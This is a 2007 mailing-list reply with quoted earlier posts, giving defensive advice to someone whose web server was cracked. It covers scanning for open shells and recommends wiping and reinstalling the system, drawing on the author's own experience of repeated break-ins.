On 08/04/07, Josh Zlatin-Amishav <[EMAIL PROTECTED]> wrote:
On Sun, 8 Apr 2007, ik wrote: > I suggest, that you should scan for full open ports on your web site > (all the port range), to see if that person have an open "shell" on > your account. Good advice, though the (possible) open shell might just be running on port 80/443 (i.e. a php shell) which is already open and behind a firewall.
IMHO, if at all possible he should wipe the entire disk and re-install the system (including the boot record and stuff "outside the filesystem address range"). Short of that he will always be worried that there is yet another present left behind by the cracker. I've been through such a situation many years ago, with very low badget so everything was hosted on the same box and the managers too cheap to buy a separate firewall machine we kept being cracked by a script kiddy and I didn't know where to start patching the holes he exploited (and probably new ones he opened for himself). Without being able to re-install the system he just kept coming in despite all the cleanups. These days it's a matter of how much? 300$ and a days work to put up an extra temporary server while you re-install the main one? Most desktops are strong enough to host web sites so you might not even have to buy dedicated server hardware. --Amos